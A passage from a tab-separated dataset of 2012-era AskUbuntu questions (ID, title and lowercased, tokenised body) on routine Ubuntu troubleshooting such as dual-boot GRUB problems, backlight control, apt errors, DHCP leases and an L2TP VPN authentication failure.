/home/sabyasachi/downloads/r2012a_unix '' -tmpdir `` /tmp/mathworks_26521 '' installing ... /tmp/mathworks_26521/sys/java/jre/glnxa64/jre/bin/java : error while loading shared libraries : libjli.so : can not open shared object file : no such file or directory finished sabyasachi @ sabyasachi-ubuntu : ~/downloads/r2012a_unix $
151830	no `` choose os '' screen after co-installation of ubuntu 12.04	i do n't have any technical knowledge of ubuntu but wanted to install it on a partition . step-by-step of what i did . used disk management in windows 7 to clear 50gb of space used a usb live ubuntu 12.04 installer in custom install mode used the installer 's built in disk manager to set up 2gb swap space and 48gb ext4 space ran installation , with option to copy over documents and settings from windows 7 restarted after completion . after this , my computer automatically loads ubuntu 12 and skips the option to load windows 7. i know the files are still there , as i can see them in the file manager . when trying to fix with the win7 installer dvd it tries to repair the os in drive [ d : ] i.e . it recognises the disc itself as the os and ignores the [ c : ] files . i think , after browsing around here , similar problems suggest this is a problem with the boot loader , but if the win7 dvd wo n't work , then i do n't have any way to fix this . does anyone know of a way to force the computer to show a `` choose os '' screen ?
151831	screen backlight control for asus g55v	i 've just installed ubuntu 12.04 on an asus g55v laptop and neither the laptop brightness control keys ( fn+f5 , fn+f6 ) nor the brightness setting are able to control the backlight . note that i 've installed the nvidia-current driver , as the laptop is equiped with a geforce gtx 660m , and it 's working fine . so far here is what have tried to no avail : switch to a console ( alt+f1 ) and use the laptop brightness control keys ( this method was working with 10.04 and lenovo t410 ) , echo 2 > /sys/class/backlight/acpi_video0/brightness , added grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' to /etc/default/grub and updated grub config , also tried without acpi_osi=linux . out of all these attempts , one thing changed : if i change the brightness in the bios bootloader right before booting on the hdd , the brightness setting stays the same in ubuntu . this is an acceptable temporary workaround but i would really like to be able to control the backlight brightness from ubuntu ( can be from command line , fine with me ) . any suggestions on what to try next would be highly appreciated .
151840	how to disable gdm from being automatically started ?	after ubuntu server 12.04 installation , i installed xubuntu just to have a minimal gui : sudo apt-get install x-window-system-core sudo apt-get install -- no-install-recommends xubuntu-desktop gparted but now i want to start x just on certain ocasions . before 12.04 , i just issue : sudo update-rc.d -f gdm remove but this command does not work anymore . how can i stop x from init on ubuntu 12.04 ? and how can i start it when i need it ? i have tried both of these questions but i do n't have a gdm.conf : disable gdm on ubuntu netbook remix how do i disable gdm and graphical user selection ?
151843	exclude bad ram bytes	i have 5 bytes ( or bits , do n't know ) of bad ram . how can i exclude these bytes so my ubuntu 11.10 do n't use them . my pc randomly freez , and when i ran memtest it reported 5 errors .
151845	incompatible group permissions in linux - is it a bug ?	i am on ubuntu 11.04 . i am creating another user and placing an existing user in the group of other user , hoping to write in the home directory of other user . # uname -a linux vini 2.6.38-11-generic # 50-ubuntu smp mon sep 12 21:18:14 utc 2011 i686 athlon i386 gnu/linux # whoami sachin # su root # useradd -m -u foo // create user foo # usermod -a -g foo sachin // add user `sachin ' to group `foo' # chmod 770 /home/foo/ # exit # whoami sachin # cd /home/foo/ bash : cd : /home/foo/ : permission denied # groups sachin sachin : sachin foo this is totally weird . though user sachin is in group foo , and group bits for /home/foo/ is set to rwx , sachin ca n't chdir to /home/foo/ . i am not able to understand this . but , if at the exit step , i switch to sachin user from root , this is what happens : # uname -a linux vini 2.6.38-11-generic # 50-ubuntu smp mon sep 12 21:18:14 utc 2011 i686 athlon i386 gnu/linux # whoami sachin # su root # useradd -m -u foo // create user foo # usermod -a -g foo sachin // add user `sachin ' to group `foo' # chmod 770 /home/foo/ # su sachin # whoami sachin # cd /home/foo/ # ls examples.desktop now , whatever is happening here is totally incomprehensible . does su sachin inherits some permissions from the root user at this step ? any explanations would be much appreciated .
151848	how do i use this add/remove widget ?	how do i add this little add/remove gtk widget in glade designer 3.12.1 ? i do n't see it anywhere in the widget bar . if it ca n't be done using the glade designer , then what should i add to the glade file to get it ?
151849	how can i install ubuntu 10.04 to replace 12.04 ?	i would like to wipe hard drive clean and start over . how can i download ubuntu 10.4 from ubuntu web-site and install it instead of ubuntu 12.04 ?
151851	apt-get keeps saying to check internet , while i have a good connection	i need to check if i have updates for ubuntu . i think it is 12.04 as you can see this is what it says : failed to download repository information check your internet connection . details : w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) /dists/precise/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) /dists/precise/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch http : //ppa.launchpad.net/ferramroberto/java/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/ferramroberto/java/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead .
151857	how can i install a hebrew supporting microsoft word ?	i 've installed ubuntu for my little sister 's pc , it fits perfectly with most of the things she does except for word processing . she must use ms office ( and not libreoffice as it is not 100 % compatible with ms office ) for school projects . i 've tried installing it with wine and playonlinux , but that causes problems with hebrew , it just does n't write correctly . now i 'm pursuing other alternatives . i 'm thinking of trying installing a vm on on her computer and using it for all the must have windows applications . how 's that solution ? are there any better alternatives ?
151859	how to wipe all deja dup backups ?	i am unsure about what is the recommended way of wiping a deja dup backup . i 've made a restructuring and a correction to the way my backups are made , and removed a large entity , cough rootfs , cough from my backup list . ( yes , it was silly to add it in the first place . ) the problem i 'm having is that deja dup will most probably not act in the way i want it to when i make a new backup , therefore i want to wipe all of the backed up files . they are stored on an external harddrive in its own folder . i ca n't reformat the whole folder , as it is also home to a couple of harddrive images . would the recommended method be by using `` rm duplicity* '' or is there a better way to do this ? it would be nice if this was made simpler somehow .
151860	i updated yesterday 15.6.2012 and now i cant boot with 3.2.0-25 i have to enter with 3.2.0-24	i updated yesterday 15.6.2012 and now i cant boot with 3.2.0-25 i have to enter with 3.2.0-24 . can anyone help ?
151863	how does thumbnail preview in ubuntu differ from that of windows ?	i thought this question might get a better response in askubuntu , as it seems to have more to do with ubuntu than windows at a glance . let 's say i have a foo.mkv file . thumbnail previews work in both windows 7 and ubuntu . when i change the filename to anything random like foo.bar or when i remove the extension itself ( making it just foo ) , nautilus shows thumbnails normally like if it can recognize what type of files they are - without looking at file extension . this however , does n't happen in windows 7 . windows starts asking me things like which application i want to use to open that file as soon as i remove file extension ( forget thumbnails ... ) etc . so , how does this thumbnail preview work in windows 7 and ubuntu ? what makes ubuntu recognize files `` out of the box '' unlike windows 7 ?
151865	ca n't find file for ubuntu 64 bit to load into the pendrivelionux program	i am trying to install ubuntu 64 bit through a bootable usb . i downloaded the software but i ca n't find the file to add to the pendrivelinux program . what is the file called and where is it located ?
151868	problem with ubuntu 12.04 after installation	i have installed ubuntu 12.04 on my pc , but when i boot ubuntu , it simply shows the wallpaper , not any menus or other form of interface . my keyboard does nothing . what can i do to alleviate the situation ?
151870	no sound through hdmi to tv	i have a toshiba satellite laptop model p745-s4102 with intel integrated graphics and ubuntu 12.04 lts installed recently . when i connect my hdmi tv to it i only get video through it and no audio . in the system settings - > sound , there is no option to select hdmi as the output . i read other threads in this site and it seems like at least guys had hdmi option but no sound . i do n't even get that . please help ! !
151872	unable to locate package appmenu-gtk3	yesterday i upgraded my version of ubuntu . in stead of gnome i now have the unity environment . i 'm not sure i like unity better , so i 'll give it a probation period to see if it 's any good . what i really do not like though , is the global menu bar . after googling i found that i had to enter : sudo apt-get remove appmenu-gtk3 appmenu-gtk appmenu-qt if i do that i get the error message : e : unable to locate package appmenu-gtk3 can anyone tell me what i 'm doing wrong here and explain how to fix this problem ?
151875	program to help order undated photos	i have a large number of photos which have the correct datetimeoriginal set in exif . i have about 300 photos for which the datetimeoriginal is completely wrong . the datetimeoriginals of these photos are not correlated , so i can not change their time en masse . it must be done individually . i 'm looking for a program that would essentially allow me to drag and drop the incorrectly time stamped photos into their place in the sequence of correctly time stamped photos . it would be nice to then be able to have the datetimeoriginal tag updated , or the photos renamed chronologically . thanks !
151876	gpg passcode error	i just created my gpg key using developer.ubuntu.com packaging page 's documentation and also upload the public key in key server . when i import the key into launchpad it sent me an encrypted message . now i give a command to decrypt the message gpg -d launchpad.txt it asked for a passcode . i gave one which i used to create gpg key . but it shows error again again . i repeat the process ( gpg creation ) again but stuck on ... . passcode ( decryption ) . what is the problem ?
151878	documentation for xsession ubuntu 12.04	where i can find info about xsessions in ubuntu 12.04 ? documents , blogs , anything is ok. my project is about boot in kiosk mode , and i need it . thanks for your help ! ( i speak spanish , my english sucks , surely you noticed hahah )
151879	why are softwares not packaged in a single file ?	we see most of the windows softwares are packaged in a single executable file . when i double-click setup file , it sets up all the files , binaries and libraries with it . i understand the dependency of ubuntu or more generally linux packages . but i wonder , why these exists . is n't it possible to build a single file with all dependencies ? what is the problems with this method ? please try to give the reason in details .
151882	unable to run ubuntu software center in 12.04	i think i 've tried everything found . it is on just for a second . i ca n't even send an error report . what should i do ? thanks in advance . so this is what i get after typing software-center in terminal ( sorry , not as a code ) : 2012-06-16 22:54:17,610 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-06-16 22:54:17,617 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-06-16 22:54:18,142 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-06-16 22:54:18,697 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 149 , in open self._list.read_main_list ( ) systemerror : e : typ „ain“ je neznámy na riadku 2 v zozname zdrojov /etc/apt/sources.list.d/yannubuntu-boot-repair-precise.list 2012-06-16 22:54:21,916 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1358 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1288 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 149 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 168 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 240 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 491 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 266 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 430 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 419 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__'
151883	ctrl+alt+t does n't open terminal ( compiz related ? )	ctrl+alt+t does n't open the terminal , and i 'm pretty sure it 's got something to do with compiz . compiz disabled the transparency on my launcher ( using ubuntu 12.04 lts with unity ) and so i uninstalled it . but after i uninstalled compiz , my ui was messed up , so i reinstalled it . now ctrl+alt+t does n't open the terminal . system settings > > keyboard > > shortcuts has the shortcut to terminal there , but it simply does not work . what should i do ?
151884	is there ongoing work in the kernel team to improve battery life under linux ?	i have read in some forums that the kernel team is working on improving battery life and energy efficiency in linux . unfortunately our community really lags behind windows and mac in that regard . i would like to read about the reasons why this difference exists with other platforms . is it purely due to closed hardware specs from vendors or does it has to be with kernel design issues ? apple devices with unix cores have amazing battery times , but they also design their own hardware . i just want to understand these issues in a less technical way . i know that recent kernel updates in ubuntu have improved the battery life in most computers , but i was wondering if there is still development going on and where can i read more about it .
151891	wireless broken after latest 12.04 update	i updated 12.04 yesterday and it broke my wireless connection . iwconfig lo no wireless extensions . eth0 no wireless extensions . l @ ubuntu : ~ $ lspci|grep network 03:00.0 network controller : ralink corp. rt3090 wireless 802.11n 1t/1r pcie in the hardware drivers , i see - rt3090sta is activated but currently not in use . wicd does not show wireless networks . can someone help me please ?
151894	installed stuff & can not right click desktop	i wanted to change the wallpaper for each of the workstations . after following some very simple instructions i was able to do so . soon after , i discovered that i could not right click on my desktop . nothing would happen . while not entirely necessary it would be nice to have . i have reverted my changes for the time being until i can find a solution for this . i installed gnome tweaks and compizconfig to achieve my wallpaper goal . my question ... anyway i can use separate wallpapers and maintain normal functionality ?
151897	is there a standard rest api for dbus communication ?	i 've found this , but i 'm trying not to borrow code for my application . the reasoning is that if you 're writing a local html5 app , you may want to call some dbus api from javascript ( like ubuntuone for example ) .
151900	how to adjust mouse drag threshold in lubuntu	with normal clicking , i 'm dragging widgets on web pages by accident . i need to adjust the mouse drag threshold . http : //library.gnome.org/users/gnome-help/3.3/mouse-drag-threshold.html.en tells me how to do it in gnome . how in lubuntu ? please answer for lubuntu . **edit i do n't have a touchpad . mouse drag threshold is the distance the mouse moves in pixels before it decides that you are dragging a widget .
151901	how can i get f.lux working ?	i 've installed the fluxgui package from killian valkhof 's ppa ( https : //launchpad.net/~kilian/+archive/f.lux ) and started the applet by pressing alt+f2 and typing in fluxgui . the inidcator icon shows up and i 've entered my latitude/longitude , but my screen colors are n't changing . the applet fails to open its preferences dialogue as well . what gives ? any solutions ?
151903	how can i reduce unity 3d 's memory usage ?	i have a problem with ubuntu 12.04 64-bit installed on acer aspire ao 722 with amd c-60 processor . at the first startup , ubuntu is much more resource consuming up to 500mb with unity 3d . after i checked , was the most resource consuming is xorg and compiz . is it normal ? my comparison with the intel atom netbook 32-bit consuming resource only up to 190mb with unity 3d . any solution for that ?
151908	how do i make a live usb without destroying my windows computer ?	unlike every other post i have read , let me begin by saying that i am terrified of destroying my windows 7 home system in the attempt of making a bootable ubuntu thumb drive . i very specifically do not want to attempt configuring a dual boot system . what i am seeking is a portable operating system on a thumb drive , through which i can run my corel software via virtualbox-4.1.16-78094-win . i want to be able to use my own software on my work computer without any worries about screwing up the host system anywhere i go . supposedly , i just made a bootable thumb drive , having successfully loaded the iso for ubuntu-12.04-desktop-i386 using pendrivelinux 's universal-usb-installer-1.9.0.1 however , all that i get is a thumb drive that wants to install unbutu onto my pc 's hdd . i am not finding any clear path to this end in the posts i am reading . like it or not , windows is a fact of life for me . the goal is to be able to use my software on my work pc without doing anything intrusive that will cost me my job . if i have a meltdown on my pc at home trying to make this happen , it will be nearly as bad . is this even do-able ? can the process be made clear ? thank you , ubuntu world ... !
151914	downgrading lamp 's php ?	i 'm somewhat new to ubuntu . i am a web developer , and i 've been trying to install lamp properly so i can test my creations . here 's my issue , i use php 5.2.5 to program as i find it to be the superior version of php , others ma disagree at will lol . i believe lamp comes with php 5.3 if not higher , how do i go about downgrading . i 'm used to the windows environment where i can just download an executable .
151915	how to route between 2 connections ( different network ) in 1 pc ( wired & wireless card ) ?	i have a problem to make a routing table for my pc . i have 1 pc running on ubuntu , and i have 2 connection card ( eth0 & wlan0 ) . eth0 ip : 192.168.1.1/24 wlan0 ip : 10.10.10.1/24 with dhcp-server installed client with ip : 10.10.10.2 connected to my router wlan0 but not connected to my eth0 network . how to solve this problem ? thanks
151916	java wont run in firefox ?	i have icedtea installed , but when i go to run my favorite java application , runescape , in the browser , it says i do n't have java installed in firefox . is there any way to say , turn it on ?
151928	create a quickly app with build dependencies	i am creating a quickly app in ubuntu that depends on python twisted , which is available in the package python-twisted . how should i add python twisted as a dependency so that it will be installed when a user installs my application ?
151930	how to install ubuntu 11.04 's system settings in ubuntu 12.04 ?	i loved how system settings ( or control center ) looked back in ubuntu 11.04 . the system settings in 11.10 looks like the one in osx , which i do n't like it . how can i have it in ubuntu 12.04 ? or is there any third-party system settings that has the same functionality or look ?
151932	running 12.04 on a dell inspiron 1545 having random system lockups	i just reinstalled a fresh 12.04 because i could n't even get booted on my previous installation anymore . i just installed 8gb of ram on this laptop , but the problem happened even before this , and all i have installed in this run on ubuntu is : ia32libs , oracle jdk7 and the 32bit jre junipernc jupiter the laptop has never been used very heavily , so could someone get back to me on this , let me know what further information you need about my machine , or files to upload . thanks !
151933	frequent grub rescue error : unknown filesystem	it 's really frustrating . three week 's back story : i faced the following error on ubuntu 10.04 lts desktop , error : unknown filesystem grub rescue > i tried many solutions online apart from 1 and 2 and eventually i could not boot my system at all . trying those solutions could not completely fix it and then i had to face initramfs ( could not remember exact error ) . as i could not fix , a week back i did a fresh install of ubuntu 12.04 desktop and after a week i.e , now , i got the same grub rescue > error . could anybody tell me what 's the reason behind this error ? . is there any problem with the ubuntu or it 's a problem at my side due to some reason ? . my machine description : i have two hard disks , windows is installed on one hard disk and on another it 's ubuntu . i installed the operating systems ( vista , ubuntu ) such a way one is not known to another , i mean to say , i 'll unplug one hard disk and install the ubuntu and similarly i 'll unplug the ubuntu hard disk , installed the vista on another hard disk , generally i do ( i actually do n't want to run into grub/boot.ini issues installing oss connecting both the hard disks ) . when ever i power on the computer windows will boot by default , and i 'll generally boot to ubuntu by pressing f8 and selecting the ubuntu hard disk . any help is greatly appreciated ! . thank you !
151934	awesome and lxde desktop managers messed up kde	i saw a desktop manager named `` awesome '' earlier on google+ , and thought i 'd give it a try . in short , i did n't like it , but it got me wondering what other desktops were like , which i had n't tried . the first one to come to mind was lxde . i installed that , and tried it . i was n't a big fan , so i just went to log back into kde . only , when i log in , everything is screwy . my theme is weird ( although , according to system settings , it is still the same ) . all the categories and application short cuts in the kmenu are gone , except my favorites , which are now renamed with the `` short name '' , it seems . i know these things are global resources , so it is very likely that one of these window managers screwed it up , but i need it fixed . actually , it seems that after restarting the theme problem fixed itself , but the kmenu items disappearing is still a problem . does anyone know where these items are stored ? ( i know they are are just .desktop files somewhere , iirc , but i do n't remember where they are usually stored so i can see if they are still there ) . i 'm hoping it 's just a matter of a broken link or something somewhere , not deleted shortcuts ... : / in summary : any ideas on what caused this ? do you know how to fix the kmenu , or at least where the .desktop shortcuts are stored for the kmenu so i can see if they still exist ( crosses fingers ) .
151935	create a screencast in a low end pc , but fast ( maybe by sacrificing compression ? )	as the title suggests , i am asking a lot . we 've been trying to generate some screencasts on my eeepc . recordmydesktop is doing the job decently , but only if allowed time to `` compile '' the video afterwards . if we ask it to do `` on the fly '' , video and audio get out of sync . now , we are creating many screencasts as practice ( and like to watch them after , to criticize ) . reducing quality is undesirable , because eventually a good practice run becomes the one we 'll release . so we 'd like a way to do screencasts `` on the fly '' , with decent quality , on the low end machine . as nothing is ever free , we are willing to sacrifice : we do n't care too much about compression : 20gb for a 15min video is acceptable
151938	anyone know if 12.04 has opengl aux libraries ?	im wanting to know how to install ubuntu 12.04 's opengl aux libraries if any . im trying to program opengl with c++ . i cant find anything on google so . any help would be super great ! ! !
151941	how can you completely remove a package ?	i am trying to do a clean install of the octave3.2 package . to do this , i removed it , then tried to reinstall it . when i reinstalled , an error occurred . it could be a bug in the package , but i want to make sure i have everything removed so that i can do a clean install . is it enough to do this ? sudo apt-get -- purge remove octave3.2
151951	how do i prevent ubuntu from capturing the alt key to show the hud ?	when i press alt key on virtualbox machine ( ex xp ) , ubuntu 12.04 catch that key . how to prevent ubuntu catch alt key ? thank you~
151953	how does run option in geany text editor work ?	i have seen the run option ( f5 ) in the geany text editor . if i run an html file it opens a browser and in case of php code it will show all the html content on the terminal . i was wondering what exactly is this run option supposed to do .
151954	can do an `` apt-get update '' but for only for one package ?	after adding a new ppa to the repository , is it necessary to update the whole database ? by `` whole database '' i mean is it necessary to update index 's of each and every packege ? if it 's not necessary , then how can i update only that specific package whose ppa i have just added into the repository . for example , if i add an ppa by typing the following in terminal , sudo add-apt-repository ppa : tiheum/equinox then we normally run the following command after it , sudo apt-get update but how can i update the only package which is associated with the above ppa , instead of updating the whole database .
151958	how to make dhclient forget its last dhcp lease ?	what i 'm trying to achieve is to get cold-start , zero-state dhcp lease which means forcing dhclient through the full discovery and configuration process ( dhcpdiscover–dhcpoffer–dhcprequest–dhcpack as opposed to the shortcutted dhcprequest–dhcpack cycle which uses a remembered address ) . i need this to debug a network configuration problem . i have tried : flushing current lease with dhclient -r , disconnecting the current network manager connection ; killing any leftover dhclient and dnsmasq processes ; cleaning /var/lib/dhcp/ directory , which supposedly contains the client lease database ; sudo restart network-manager . but even after these steps i see in the logs dhcpdiscover immediately followed by dhcprequest of somehow still remembered address . clearly , the os is storing the address somehow else , and i 've run out of ideas . any help from the community ?
151962	is there a way to 'snap ' desktop icons into a straight line ?	i have searched here and elsewhere at length and found several good looking suggestions , but none of them have helped . i use 11.04 and despite my efforts to line up my icons in a pleasing & neat line they are all up/down & right/left jagged instead of simply straight . this is an annoyance which would be worth adding a separate program for if there is such a thing ? ! thanks .
151968	what does the term `` extended partition '' mean ? is it safe to use this type of partition ?	in the image below , what does extended 103 gb mean ?
151969	how big is the mono runtime ?	how big is the mono runtime , and how does it compare in size to other popular runtimes like python , ruby and java ?
151973	dual boot 10.04 and 12.04	i 'm currently running 12.04 , my 160gb hard disk is messed up , i 'm going to completely format it . here is what i want to do : keep 10 gb for 10.04 / keep 10 gb for 12.04 / keep 4 gb for /swap rest for /home . how should i start , install 10.04 first then 12.04 ? , am i missing anything ? also i read i can share my home folder between the two os when its on another partition , will it be done by default or do i need to take some steps to do this ?
151978	ubuntu one cloud issue	i use ubuntu one with my 12.04 lts . say , one of my folder is uploaded to the cloud , then i make some clean up operations by deleting and moving some files ( in the local folder ) . but when the folder is synchronized , the unwanted deleted files automatically downloaded to my local folder again . this behaviour is really irritating , how can i solve this ?
151982	how to access windows folder ( that installed on virtualbox ) via ubuntu ?	what is the solution that make me can access windows folder ( windows installed on virtualbox ) via linux how to let me can access like this : ~ $ cd /path/to/c : /windows
151987	l2tp connection fails !	i 've installed l2tp-ipsec-vpn but when i try to connect to the vpn server i get error 500 . here are the logs : jun 17 12:54:37.449 ipsec_setup : stopping openswan ipsec ... jun 17 12:54:38.858 stopping xl2tpd : xl2tpd . jun 17 12:54:38.859 xl2tpd [ 1511 ] : death_handler : fatal signal 15 received jun 17 12:54:38.872 ipsec_setup : starting openswan ipsec u2.6.37/k3.2.0-23-generic ... jun 17 12:54:39.027 ipsec__plutorun : starting pluto subsystem ... jun 17 12:54:39.033 ipsec__plutorun : adjusting ipsec.d to /etc/ipsec.d jun 17 12:54:39.037 recvref [ 30 ] : protocol not available jun 17 12:54:39.038 xl2tpd [ 2442 ] : this binary does not support kernel l2tp . jun 17 12:54:39.038 xl2tpd [ 2444 ] : xl2tpd version xl2tpd-1.3.1 started on atp-thinkpad-sl410 pid:2444 jun 17 12:54:39.038 xl2tpd [ 2444 ] : written by mark spencer , copyright ( c ) 1998 , adtran , inc. jun 17 12:54:39.038 xl2tpd [ 2444 ] : forked by scott balmos and david stipp , ( c ) 2001 jun 17 12:54:39.038 xl2tpd [ 2444 ] : inherited by jeff mcadams , ( c ) 2002 jun 17 12:54:39.039 xl2tpd [ 2444 ] : forked again by xelerance ( www.xelerance.com ) ( c ) 2006 jun 17 12:54:39.039 xl2tpd [ 2444 ] : listening on ip address 0.0.0.0 , port 1701 jun 17 12:54:39.040 starting xl2tpd : xl2tpd . jun 17 12:54:39.062 ipsec__plutorun : 002 added connection description `` l2tp '' jun 17 12:55:30.753 104 `` l2tp '' # 1 : state_main_i1 : initiate jun 17 12:55:30.754 010 `` l2tp '' # 1 : state_main_i1 : retransmission ; will wait 20s for response jun 17 12:55:30.754 010 `` l2tp '' # 1 : state_main_i1 : retransmission ; will wait 40s for response jun 17 12:55:30.754 003 `` l2tp '' # 1 : ignoring vendor id payload [ ms nt5 isakmpoakley 00000008 ] jun 17 12:55:30.754 003 `` l2tp '' # 1 : received vendor id payload [ rfc 3947 ] method set to=109 jun 17 12:55:30.754 003 `` l2tp '' # 1 : received vendor id payload [ draft-ietf-ipsec-nat-t-ike-02_n ] meth=106 , but already using method 109 jun 17 12:55:30.755 003 `` l2tp '' # 1 : ignoring vendor id payload [ fragmentation ] jun 17 12:55:30.755 003 `` l2tp '' # 1 : ignoring vendor id payload [ ms-negotiation discovery capable ] jun 17 12:55:30.755 003 `` l2tp '' # 1 : ignoring vendor id payload [ ike cga version 1 ] jun 17 12:55:30.755 106 `` l2tp '' # 1 : state_main_i2 : sent mi2 , expecting mr2 jun 17 12:55:30.755 010 `` l2tp '' # 1 : state_main_i2 : retransmission ; will wait 20s for response jun 17 12:55:30.755 003 `` l2tp '' # 1 : nat-traversal : result using rfc 3947 ( nat-traversal ) : i am nated jun 17 12:55:30.755 108 `` l2tp '' # 1 : state_main_i3 : sent mi3 , expecting mr3 jun 17 12:55:30.756 004 `` l2tp '' # 1 : state_main_i4 : isakmp sa established { auth=oakley_preshared_key cipher=oakley_3des_cbc_192 prf=oakley_sha group=modp1024 } jun 17 12:55:30.756 117 `` l2tp '' # 2 : state_quick_i1 : initiate jun 17 12:55:30.756 010 `` l2tp '' # 2 : state_quick_i1 : retransmission ; will wait 20s for response jun 17 12:55:30.756 003 `` l2tp '' # 2 : ignoring informational payload , type ipsec_responder_lifetime msgid=6b03ff69 jun 17 12:55:30.756 003 `` l2tp '' # 2 : nat-traversal : received 2 nat-oa . ignored because peer is not nated jun 17 12:55:30.756 003 `` l2tp '' # 2 : our client subnet returned does n't match my proposal - us:192.168.1.3/32 vs them:109.162.174.235/32 jun 17 12:55:30.757 003 `` l2tp '' # 2 : allowing questionable proposal anyway [ allow_microsoft_bad_proposal ] jun 17 12:55:30.757 004 `` l2tp '' # 2 : state_quick_i2 : sent qi2 , ipsec sa established transport mode { esp= > 0x23af21f8 < 0xdb4a87b6 xfrm=aes_128-hmac_sha1 natoa=none natd=none dpd=none } jun 17 12:55:31.759 xl2tpd [ 2444 ] : connecting to host x.x.x.x , port 1701 jun 17 12:55:32.021 xl2tpd [ 2444 ] : connection established to x.x.x.x , 1701 . local : 4720 , remote : 200 ( ref=0/0 ) . jun 17 12:55:32.023 xl2tpd [ 2444 ] : calling on tunnel 4720 jun 17 12:55:32.454 xl2tpd [ 2444 ] : call established with x.x.x.x , local : 9667 , remote : 3 , serial : 1 ( ref=0/0 ) jun 17 12:55:32.456 xl2tpd [ 2444 ] : start_pppd : i 'm running : jun 17 12:55:32.456 xl2tpd [ 2444 ] : `` /usr/sbin/pppd '' jun 17 12:55:32.457 xl2tpd [ 2444 ] : `` passive '' jun 17 12:55:32.458 xl2tpd [ 2444 ] : `` nodetach '' jun 17 12:55:32.458 xl2tpd [ 2444 ] : `` : '' jun 17 12:55:32.459 xl2tpd [ 2444 ] : `` file '' jun 17 12:55:32.459 xl2tpd [ 2444 ] : `` /etc/ppp/l2tp.options.xl2tpd '' jun 17 12:55:32.460 xl2tpd [ 2444 ] : `` ipparam '' jun 17 12:55:32.461 xl2tpd [ 2444 ] : `` x.x.x.x '' jun 17 12:55:32.462 xl2tpd [ 2444 ] : `` /dev/pts/1 '' jun 17 12:55:32.583 pppd [ 2711 ] : plugin passprompt.so loaded . jun 17 12:55:32.583 pppd [ 2711 ] : pppd 2.4.5 started by root , uid 0 jun 17 12:55:32.619 pppd [ 2711 ] : using interface ppp0 jun 17 12:55:32.620 pppd [ 2711 ] : connect : ppp0 < -- > /dev/pts/1 jun 17 12:55:33.693 pppd [ 2711 ] : /usr/bin/l2tpipsecvpn exited with code 0 jun 17 12:55:34.454 [ error 404 ] authentication failed : closing connection to 'l2tp' jun 17 12:55:34.456 pppd [ 2711 ] : ms-chap authentication failed : e=691 authentication failure jun 17 12:55:34.457 pppd [ 2711 ] : chap authentication failed jun 17 12:55:34.461 stopping xl2tpd : xl2tpd . jun 17 12:55:34.462 xl2tpd [ 2444 ] : death_handler : fatal signal 15 received jun 17 12:55:34.463 pppd [ 2711 ] : modem 